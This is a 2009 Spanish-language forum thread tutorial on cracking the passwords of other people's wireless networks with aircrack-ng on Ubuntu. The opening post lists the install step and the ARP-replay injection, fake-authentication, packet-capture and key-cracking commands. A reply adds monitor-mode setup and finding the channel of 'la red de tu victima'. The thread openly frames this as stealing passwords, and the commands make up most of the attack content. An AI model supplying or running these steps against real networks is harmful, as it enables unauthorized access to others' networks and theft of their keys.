hackear redes inalambricas con ubuntu linux

Tema en 'GNU/Linux' iniciado por mxmetroid, 4 Jul 2009.

1. Hola hacia ya un buen rato que no posteaba nada por aca ...pero es que la ingenieria me trae loco...pero bueno ya que tengo tiempo les dejo un pequeno video-tutorial que hice en ubuntu 9.04 para robar las contrasenas de las redes inalambricas con clave...tambien por ahi les dejo un video de youtube muy parecido a lo que yo hice ... cualquier duda avisenme que con gusto respondere.

Antes de eso debes instalar el aircrack-ng en ubuntu. eso lo haces tipeando lo siguiente:

sudo apt-get install aircrack-ng
    descargar aca mi video-tutorial
    estos comandos son los que uso en el video:

aireplay-ng --arpreplay -b [BSSID de la red] -h [direccion MAC de cliente conectado] [Interface]

aireplay-ng -1 0 -a [BSSID de la red] -h [ cliente MAC address] -e [ESSID or Nombre red] [Interface]

airodump-ng -c [Channel] --bssid [BSSID de la red] -w [nombre archivo captura] mon0

aircrack-ng -z [Capture file name]

aca les dejo un video muy parecido al mio ... si no le llegan a entender preguntenme yo les respondo con todo gusto. cabe aclarar que este video de youtube tambien usan linux ubuntu

[YOUTUBE]TiPWUykw3uU[/YOUTUBE]

2. bueno el post esta hecho para esa gente que desea aprender...en fin no veo respuesta del publico...

3. a es que primero tenes que hacer esto:

bajas la tarjeta: sudo airmon-ng stop wlan0
    la subis: sudo airmon-ng start wlan0
    ojo aca dsps de subir te dira mon0 activado en modo monitor (mon0 es el seudo que le da a tu tarjeta en modo escucha)
    luego con este otro comando veras las redes a tu alcance:
    sudo aireplay-ng mon0
    dsps de tipear eso chequea que canal esta la red de tu victima
    ahora que sabesel canal volve a bajar la tarjeta
    sudo airmon-ng stop mon0
    sudo airmon-ng stop wlan0
    si el canal fue el 6 haces esto para subir de nuevo:
    sudo airmon-ng start wlan0 6
    y listo seguis con el tutorial

4. Muy buen post, gracias por compartir

Compartir